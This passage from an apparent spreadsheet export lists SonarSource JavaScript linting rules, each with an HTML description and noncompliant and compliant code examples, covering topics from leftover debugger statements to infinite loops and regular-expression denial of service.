in the code. By definition such statement must absolutely be removed from the source code to prevent any unexpected behavior or added vulnerability to
attacks in production.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (i = 1; i&amp;lt;5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
  // Wait for user to resume.
  debugger;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (i = 1; i&amp;lt;5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S4507} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1527</t>
  </si>
  <si>
    <t>"future reserved words" should not be used as identifiers</t>
  </si>
  <si>
    <t>&lt;p&gt;The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier
adoption of those potential future versions:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;await&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;class&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;const&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;enum&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;export&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;extends&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;implements&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;import&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;interface&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;let&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;package&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;private&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;protected&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;public&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;static&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;super&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;yield&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use of these words as identifiers would produce an error in JavaScript &lt;code&gt;strict&lt;/code&gt; mode code.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var package = document.getElementsByName("foo"); // Noncompliant
var someData = { package: true };                 // Compliant, as it is not used as an identifier here
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var elements = document.getElementsByName("foo"); // Compliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2757</t>
  </si>
  <si>
    <t>Non-existent operators '=+', '=-' and '=!' should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of operators pairs (&lt;code&gt;=+&lt;/code&gt;, &lt;code&gt;=-&lt;/code&gt; or &lt;code&gt;=!&lt;/code&gt;) where the reversed, single operator was meant (&lt;code&gt;+=&lt;/code&gt;,
&lt;code&gt;-=&lt;/code&gt; or &lt;code&gt;!=&lt;/code&gt;) will compile and run, but not produce the expected results.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when &lt;code&gt;=+&lt;/code&gt;, &lt;code&gt;=-&lt;/code&gt; and &lt;code&gt;=!&lt;/code&gt; are used without any space between the two operators and when
there is at least one whitespace after.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let target =-5;
let num = 3;
target =- num;  // Noncompliant; target = -3. Is that really what's meant?
target =+ num; // Noncompliant; target = 3
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let target = -5;
let num = 3;
target = -num;  // Compliant; intent to assign inverse value of num is clear
target += num;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S101</t>
  </si>
  <si>
    <t>Class names should comply with a naming convention</t>
  </si>
  <si>
    <t>&lt;p&gt;Shared coding conventions allow teams to collaborate effectively. This rule allows to check that all class names (and interfaces for TypeScript)
match a provided regular expression.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With default provided regular expression &lt;code&gt;^[A-Z][a-zA-Z0-9]*$&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
class my_class {...}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
class MyClass {...}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3801</t>
  </si>
  <si>
    <t>Functions should use "return" consistently</t>
  </si>
  <si>
    <t>&lt;p&gt;Unlike strongly typed languages, JavaScript does not enforce a return type on a function. This means that different paths through a function can
return different types of values, which can be very confusing to the user and significantly harder to maintain.&lt;/p&gt;
&lt;p&gt;In particular a function, in JavaScript, will return &lt;code&gt;undefined&lt;/code&gt; in any of the following cases:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; It exits without a &lt;code&gt;return&lt;/code&gt; statement. &lt;/li&gt;
  &lt;li&gt; It executes a &lt;code&gt;return&lt;/code&gt; with no value. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This rule verifies that return values are either always or never specified for each path through a function.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo(a) { // Noncompliant, function exits without "return"
  if (a == 1) {
    return true;
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {
  if (a == 1) {
    return true;
  }
  return false;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1192</t>
  </si>
  <si>
    <t>String literals should not be duplicated</t>
  </si>
  <si>
    <t>&lt;p&gt;Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.&lt;/p&gt;
&lt;p&gt;On the other hand, constants can be referenced from many places, but only need to be updated in a single place.&lt;/p&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;To prevent generating some false-positives, literals having less than 10 characters are excluded as well as literals matching &lt;code&gt;/^\w*$/&lt;/code&gt;.
String literals inside import/export statements and JSX attributes are also ignored. The same goes for statement-like string literals, e.g. &lt;code&gt;'use
strict';&lt;/code&gt;.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1515</t>
  </si>
  <si>
    <t>Functions should not be defined inside loops</t>
  </si>
  <si>
    <t>&lt;p&gt;Defining a function inside of a loop can yield unexpected results. Such a function keeps references to the variables which are defined in outer
scopes. All function instances created inside the loop therefore see the same values for these variables, which is probably not expected.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var funs = [];
for (var i = 0; i &amp;lt; 13; i++) {
  funs[i] = function() { // Non-Compliant
    return i;
  };
}
console.log(funs[0]()); // 13 instead of 0
console.log(funs[1]()); // 13 instead of 1
console.log(funs[2]()); // 13 instead of 2
console.log(funs[3]()); // 13 instead of 3
...
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1751</t>
  </si>
  <si>
    <t>Loops with at most one iteration should be refactored</t>
  </si>
  <si>
    <t>&lt;p&gt;A loop with at most one iteration is equivalent to the use of an &lt;code&gt;if&lt;/code&gt; statement to conditionally execute one piece of code. No developer
expects to find such a use of a loop statement. If the initial intention of the author was really to conditionally execute one piece of code, an
&lt;code&gt;if&lt;/code&gt; statement should be used instead.&lt;/p&gt;
&lt;p&gt;At worst that was not the initial intention of the author and so the body of the loop should be fixed to use the nested &lt;code&gt;return&lt;/code&gt;,
&lt;code&gt;break&lt;/code&gt; or &lt;code&gt;throw&lt;/code&gt; statements in a more appropriate way.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (let i = 0; i &amp;lt; 10; i++) { // noncompliant, loop only executes once
  console.log("i is " + i);
  break;
}
...
for (let i = 0; i &amp;lt; 10; i++) { // noncompliant, loop only executes once
  if (i == x) {
    break;
  } else {
    console.log("i is " + i);
    return;
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (let i = 0; i &amp;lt; 10; i++) {
  console.log("i is " + i);
}
...
for (let i = 0; i &amp;lt; 10; i++) {
  if (i == x) {
    break;
  } else {
    console.log("i is " + i);
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S117</t>
  </si>
  <si>
    <t>Variable, property and parameter names should comply with a naming convention</t>
  </si>
  <si>
    <t>&lt;p&gt;Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule checks that all variable,
property and parameter names match a provided regular expression.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With the default regular expression &lt;code&gt;^[_$A-Za-z][$A-Za-z0-9]*$|^[_$A-Z][_$A-Z0-9]+$&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
const foo_bar = 1;
const baz_ = 2;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const fooBar = 1;
const _baz = 2;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2189</t>
  </si>
  <si>
    <t>Loops should not be infinite</t>
  </si>
  <si>
    <t>&lt;p&gt;An infinite loop is one that will never end while the program is running, i.e., you have to kill the program to get out of the loop. Whether it is
by meeting the loopâ€™s end condition or via a &lt;code&gt;break&lt;/code&gt;, every loop should have an end condition.&lt;/p&gt;
&lt;h3&gt;Known Limitations&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt; False positives: when &lt;code&gt;yield&lt;/code&gt; is used - &lt;a href="https://github.com/SonarSource/SonarJS/issues/674"&gt;Issue #674&lt;/a&gt;. &lt;/li&gt;
  &lt;li&gt; False positives: when an exception is raised by a function invoked within the loop. &lt;/li&gt;
  &lt;li&gt; False negatives: when a loop condition is based on an element of an array or object. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (;;) {  // Noncompliant; end condition omitted
  // ...
}
var j = 0;
while (true) { // Noncompliant; constant end condition
  j++;
}
var k;
var b = true;
while (b) { // Noncompliant; constant end condition
  k++;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
while (true) { // break will potentially allow leaving the loop
  if (someCondition) {
    break;
  }
}
var k;
var b = true;
while (b) {
  k++;
  b = k &amp;lt; 10;
}
outer:
while(true) {
  while(true) {
    break outer;
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1301</t>
  </si>
  <si>
    <t>"switch" statements should have at least 3 "case" clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;switch&lt;/code&gt; statements are useful when there are many different cases depending on the value of the same expression.&lt;/p&gt;
&lt;p&gt;For just one or two cases however, the code will be more readable with &lt;code&gt;if&lt;/code&gt; statements.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch (variable) {
  case 0:
    doSomething();
    break;
  default:
    doSomethingElse();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (variable == 0) {
  doSomething();
} else {
  doSomethingElse();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S108</t>
  </si>
  <si>
    <t>Nested blocks of code should not be left empty</t>
  </si>
  <si>
    <t>&lt;p&gt;Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (var i = 0; i &amp;lt; length; i++) {}  // Empty on purpose or missing piece of code ?
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;When a block contains a comment, this block is not considered to be empty. Moreover &lt;code&gt;catch&lt;/code&gt; blocks are ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S4829</t>
  </si>
  <si>
    <t>Reading the Standard Input is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2337"&gt;CVE-2005-2337&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11449"&gt;CVE-2017-11449&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin)
can be dangerous and should be validated.&lt;/p&gt;
&lt;p&gt;This rule flags code that reads from the standard input.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; data read from the standard input is not sanitized before being used. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You are at risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet"&gt;Sanitize&lt;/a&gt; all data read from the standard input before using it.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// The process object is a global that provides information about, and control over, the current Node.js process
// All uses of process.stdin are security-sensitive and should be reviewed
process.stdin.on('readable', () =&amp;gt; {
	const chunk = process.stdin.read(); // Sensitive
	if (chunk !== null) {
		dosomething(chunk);
	}
});
const readline = require('readline');
readline.createInterface({
	input: process.stdin // Sensitive
}).on('line', (input) =&amp;gt; {
	dosomething(input);
});
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/20.html"&gt;MITRE, CWE-20&lt;/a&gt; - Improper Input Validation &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S106</t>
  </si>
  <si>
    <t>Standard outputs should not be used directly to log anything</t>
  </si>
  <si>
    <t>&lt;p&gt;Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you
run the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
console.log(password_entered); // Noncompliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S104</t>
  </si>
  <si>
    <t>Files should not have too many lines of code</t>
  </si>
  <si>
    <t>&lt;p&gt;A source file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to
maintain. Above a specific threshold, it is strongly advised to refactor it into smaller pieces of code which focus on well defined tasks. Those
smaller files will not only be easier to understand but also probably easier to test.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S909</t>
  </si>
  <si>
    <t>"continue" should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;continue&lt;/code&gt; is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured
control flow statements such as &lt;code&gt;if&lt;/code&gt; should be used instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
  for (i = 0; i &amp;lt; 10; i++) {
    if (i == 5) {
      continue;  /* Noncompliant */
    }
    alert("i = " + i);
  }
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
  for (i = 0; i &amp;lt; 10; i++) {
    if (i != 5) {  /* Compliant */
      alert("i = " + i);
    }
  }
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S905</t>
  </si>
  <si>
    <t>Non-empty statements should change control flow or have at least one side-effect</t>
  </si>
  <si>
    <t>&lt;p&gt;Any statement (other than a null statement, which means a statement containing only a semicolon &lt;code&gt;;&lt;/code&gt;) which has no side effect and does
not result in a change of control flow will normally indicate a programming error, and therefore should be refactored.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
a == 1; // Noncompliant; was assignment intended?
var msg = "Hello, "
  "World!"; // Noncompliant; have we forgotten '+' operator on previous line?
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/482"&gt;MITRE, CWE-482&lt;/a&gt; - Comparing instead of Assigning &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1534</t>
  </si>
  <si>
    <t>Property names should not be duplicated within a class or object literal</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript allows duplicate property names in classes and object literals, but only the last instance of a duplicated name determines the actual
value that will be used for it. Therefore, changing values of other occurrences of a duplicated name will have no effect and may cause
misunderstandings and bugs.&lt;/p&gt;
&lt;p&gt;Defining a &lt;code&gt;class&lt;/code&gt; with a duplicated &lt;code&gt;constructor&lt;/code&gt; will generate an error.&lt;/p&gt;
&lt;p&gt;Before ECMAScript 2015, using duplicate names will generate an error in JavaScript strict mode code.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var data = {
  "key": "value",
  "1": "value",
  "key": "value", // Noncompliant - duplicate of "key"
  'key': "value", // Noncompliant - duplicate of "key"
  key: "value", // Noncompliant - duplicate of "key"
  \u006bey: "value", // Noncompliant - duplicate of "key"
  "\u006bey": "value", // Noncompliant - duplicate of "key"
  "\x6bey": "value", // Noncompliant - duplicate of "key"
  1: "value" // Noncompliant - duplicate of "1"
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var data = {
  "key": "value",
  "1": "value",
  "key2": "value",
  'key3': "value",
  key4: "value",
  \u006bey5: "value",
  "\u006bey6": "value",
  "\x6bey7": "value",
  1b: "value"
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1530</t>
  </si>
  <si>
    <t>Function declarations should not be made within blocks</t>
  </si>
  <si>
    <t>&lt;p&gt;While most script engines support function declarations within blocks, from browser to browser, the implementations are inconsistent with each
other.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (x) {
  function foo() {} //foo is hoisted in Chrome, Firefox and Safari, but not in Edge.
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (x) {
  const foo = function() {}
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1533</t>
  </si>
  <si>
    <t>Wrapper objects should not be used for primitive types</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,
just remove the &lt;code&gt;new&lt;/code&gt; keyword, and youâ€™ll get a primitive value automatically. If you use a wrapper object as a way to add properties to a
primitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let x = new Number("0");
if (x) {
  alert('hi');  // Shows 'hi'.
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let x = Number("0");
if (x) {
  alert('hi');
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2251</t>
  </si>
  <si>
    <t>A "for" loop update clause should move the counter in the right direction</t>
  </si>
  <si>
    <t>&lt;p&gt;A &lt;code&gt;for&lt;/code&gt; loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run
infinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as &lt;code&gt;while&lt;/code&gt; loops. More
typically, an infinite &lt;code&gt;for&lt;/code&gt; loop is a bug.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (var i = 0; i &amp;lt; strings.length; i--) { // Noncompliant;
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (var i = 0; i &amp;lt; strings.length; i++) {
  //...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S135</t>
  </si>
  <si>
    <t>Loops should not contain more than a single "break" or "continue" statement</t>
  </si>
  <si>
    <t>&lt;p&gt;Restricting the number of &lt;code&gt;break&lt;/code&gt; and &lt;code&gt;continue&lt;/code&gt; statements in a loop is done in the interest of good structured
programming.&lt;/p&gt;
&lt;p&gt;Only one &lt;code&gt;break&lt;/code&gt; or one &lt;code&gt;continue&lt;/code&gt; statement is acceptable in a loop, since it facilitates optimal coding. If there is more
than one, the code should be refactored to increase readability.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (var i = 1; i &amp;lt;= 10; i++) {  // Noncompliant - 2 continue - one might be tempted to add some logic in between
  if (i % 2 == 0) {
    continue;
  }
  if (i % 3 == 0) {
    continue;
  }
  alert("i = " + i);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S126</t>
  </si>
  <si>
    <t>"if ... else if" constructs should end with "else" clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule applies whenever an &lt;code&gt;if&lt;/code&gt; statement is followed by one or more &lt;code&gt;else if&lt;/code&gt; statements; the final &lt;code&gt;else if&lt;/code&gt;
should be followed by an &lt;code&gt;else&lt;/code&gt; statement.&lt;/p&gt;
&lt;p&gt;The requirement for a final &lt;code&gt;else&lt;/code&gt; statement is defensive programming.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;else&lt;/code&gt; statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is
consistent with the requirement to have a final &lt;code&gt;default&lt;/code&gt; clause in a &lt;code&gt;switch&lt;/code&gt; statement.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (x == 0) {
  doSomething();
} else if (x == 1) {
  doSomethingElse();
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (x == 0) {
  doSomething();
} else if (x == 1) {
  doSomethingElse();
} else {
  throw "Unexpected value for x";
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S125</t>
  </si>
  <si>
    <t>Sections of code should not be commented out</t>
  </si>
  <si>
    <t>&lt;p&gt;Programmers should not comment out code as it bloats programs and reduces readability.&lt;/p&gt;
&lt;p&gt;Unused code should be deleted and can be retrieved from source control history if required.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S4784</t>
  </si>
  <si>
    <t>Using regular expressions is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16021"&gt;CVE-2017-16021&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13863"&gt;CVE-2018-13863&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as
&lt;code&gt;(a+)+s&lt;/code&gt; will take several seconds to evaluate the input string &lt;code&gt;aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs&lt;/code&gt;. The problem is that with
every additional &lt;code&gt;a&lt;/code&gt; character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular
expression, &lt;code&gt;a+s&lt;/code&gt; (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.&lt;/p&gt;
&lt;p&gt;Evaluating such regular expressions opens the door to &lt;a
href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS"&gt;Regular expression Denial of Service (ReDoS)&lt;/a&gt; attacks. In the
context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the
service inaccessible to genuine users.&lt;/p&gt;
&lt;p&gt;This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following
characters: &lt;code&gt;*+{&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Example: &lt;code&gt;(a+)*&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression. &lt;/li&gt;
  &lt;li&gt; your regular expression engine performance decrease with specially crafted inputs and regular expressions. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for
vulnerability reports mentioning the one engine youâ€™re are using.&lt;/p&gt;
&lt;p&gt;Use if possible a library which is not vulnerable to Redos Attacks such as &lt;a href="https://github.com/google/re2"&gt;Google Re2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule wonâ€™t detect this kind of injection.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const regex = /(a+)+b/; // Sensitive
const regex2 = new RegExp("(a+)+b"); // Sensitive
str.search("(a+)+b"); // Sensitive
str.match("(a+)+b"); // Sensitive
str.split("(a+)+b"); // Sensitive
&lt;/pre&gt;
&lt;p&gt;Note: String.matchAll does not raise any issue as it is not supported by NodeJS.&lt;/p&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: &lt;code&gt;(a|aa)+&lt;/code&gt;,
&lt;code&gt;(a|a?)+&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It is a good idea to test your regular expression if it has the same pattern on both side of a "&lt;code&gt;|&lt;/code&gt;".&lt;/p&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS"&gt;MITRE, CWE-624&lt;/a&gt; - Executable Regular Expression Error
  &lt;/li&gt;
  &lt;li&gt; OWASP Regular expression Denial of Service - ReDoS &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S5852} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2123</t>
  </si>
  <si>
    <t>Values should not be uselessly incremented</t>
  </si>
  <si>
    <t>&lt;p&gt;A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function pickNumber() {
  let i = 0;
  i = i++; // Noncompliant; i is still zero
  return i++; // Noncompliant; 0 returned
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function pickNumber() {
  let i = 0;
  i++;
  return ++i;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3699</t>
  </si>
  <si>
    <t>The output of functions that don't return anything should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its
"result" to a variable is probably a bug because such functions return &lt;code&gt;undefined&lt;/code&gt;, which is probably not what was intended.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo() {
  console.log("Hello, World!");
}
a = foo();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo() {
  console.log("Hello, World!");
}
foo();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2392</t>
  </si>
  <si>
    <t>Variables should be used in the blocks where they are declared</t>
  </si>
  <si>
    <t>&lt;p&gt;Variables that are declared inside a block but used outside of it (which is possible with a &lt;code&gt;var&lt;/code&gt;-style declaration) should be declared
outside the block.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function doSomething(a, b) {
  if (a &amp;gt; b) {
    var x = a - b;  // Noncompliant
  }
